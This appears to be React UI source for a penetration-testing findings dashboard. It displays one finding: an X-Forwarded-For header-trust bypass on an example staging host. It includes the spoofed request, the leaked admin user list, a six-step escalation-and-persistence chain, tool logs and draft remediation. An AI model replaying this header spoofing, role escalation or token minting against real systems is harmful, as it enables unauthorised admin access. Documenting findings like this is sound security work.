{f.id} · promoted by CIPHER · validated by r.shibata · {f.age} ago

{f.title}

method:{f.method} target:{f.target} auth:cookie+jwt repro:3/3 attempts confidence:{(f.conf*100).toFixed(0)}%

{[['http','HTTP exchange'],['diff','authorised vs bypass'],['chain','exploit chain'],['logs','tool logs']].map(([k,l]) => ( setTab(k)}>{l} ))}

3/3 captured 04:18:22 UTC+09

{tab === 'http' && (

REQUEST malicious

GET /admin/users?page=1 HTTP/2 Host: shop.merid.example.com User-Agent: "Authify-Probe/3.1" Cookie: session_id="u_28814.tier=member" Authorization: "Bearer eyJhbGciOi…" X-Forwarded-For: 10.0.0.7 Accept: application/json X-Request-Id: "a91c…f02" # Payload: low-priv user adds RFC1918 XFF. # Edge proxy strips it on prod, but staging origin trusts it.`}/>

RESPONSE 200 — bypassed 200 OK Content-Type: application/json X-Auth-Mode: internal X-Powered-By: "merid-edge/4.2" { "users": [ { "id": 1, "email": "root@merid.example.com", "role": "superadmin", "mfa": false }, { "id": 2, "email": "finance@merid.example.com", "role": "admin" }, /* + 38 more */ ], "total": 40 }`}/>

)} {tab === 'diff' && ( BASELINE no XFF GET /admin/users HTTP/2 Cookie: session_id=member Authorization: Bearer ey… → HTTP/2 401 Unauthorized { "error": "admin scope required" }`}/> BYPASS + XFF 10.0.0.7 GET /admin/users HTTP/2 Cookie: session_id=member Authorization: Bearer ey… X-Forwarded-For: 10.0.0.7 → HTTP/2 200 OK { "users": [...40 records...] }`}/> )} {tab === 'chain' && ( 1register low-priv account POST /signup → tier=member, no MFA required 2capture session via Burp macro macro authflow.macro · session_id u_28814 3probe /admin/* with XFF spray Autorize · 12 RFC1918 candidates · 10.0.0.7 trusted 4enumerate admin endpoints 28 routes accessible · GET/PUT verbs both honour bypass 5elevate to write — privilege escalation PUT /admin/users/28814/role=superadmin · Track B confirmed offline 6persist via API token mint POST /admin/tokens · scope=full · 1y · pending client approval )} {tab === 'logs' && ( [burp.scanner] 04:14:08 active scan /admin/* started [burp.autorize] 04:14:22 testing 12 header-trust mutations [burp.autorize] 04:18:22 positive X-Forwarded-For=10.0.0.7 → 200 [caido.replay] 04:18:24 cross-validate via authflow macro (3/3) [atlas.web] 04:18:25 candidate emitted → cipher queue [cipher/web] 04:18:26 classify=LIVE conf=0.96 [cipher/web] 04:18:26 matched corpus pattern "edge-trust-bypass-v3" [cipher/web] 04:18:27 promoted to F-0042 [atlas.web] 04:18:28 vault sealed: req+resp+chain+har`}/> )}

{/* Right rail */} CIPHER · NARRATIVE This is a real bypass, not a scanner false-positive. The edge proxy strips X-Forwarded-For on the production tier. The staging origin still trusts it, and the admin sub-router treats RFC1918 sources as internal — skipping the auth middleware entirely. Confidence is high: 3/3 reproduction attempts, cross-validated by Burp + Caido, payload matches our corpus pattern edge-trust-bypass-v3 (seen in 7 prior engagements, all confirmed exploitable). cipher confidence 0.96 METADATA CWE{f.cwe} OWASPA01:2021 Broken AC CVSS 3.1{f.cvss} · CRITICAL VectorAV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N First seen04:18:22 UTC+09 Reproductions3 / 3 · stable Affectsstaging · prod (untested) Operatorr.shibata · Track B Vaultsealed · evx-0042 REMEDIATION (DRAFT) 1. Strip XFF at staging edge match prod ingress policy — drop client-supplied XFF on all environments. 2. Remove header-trust shortcut admin sub-router should require positive auth scope — never infer from network position. 3. Add Autorize regression to CI fail build on any 200 from /admin/* with member-tier session. RELATED F-0040 · IDOR cross-tenantHIGH F-0035 · mass assignmentMED edge-trust-bypass-v3 corpus7 prior

{f.sev.toUpperCase()} {f.id} · {f.title}

REQUEST malicious

RESPONSE 200 — bypassed

BASELINE no XFF

BYPASS + XFF 10.0.0.7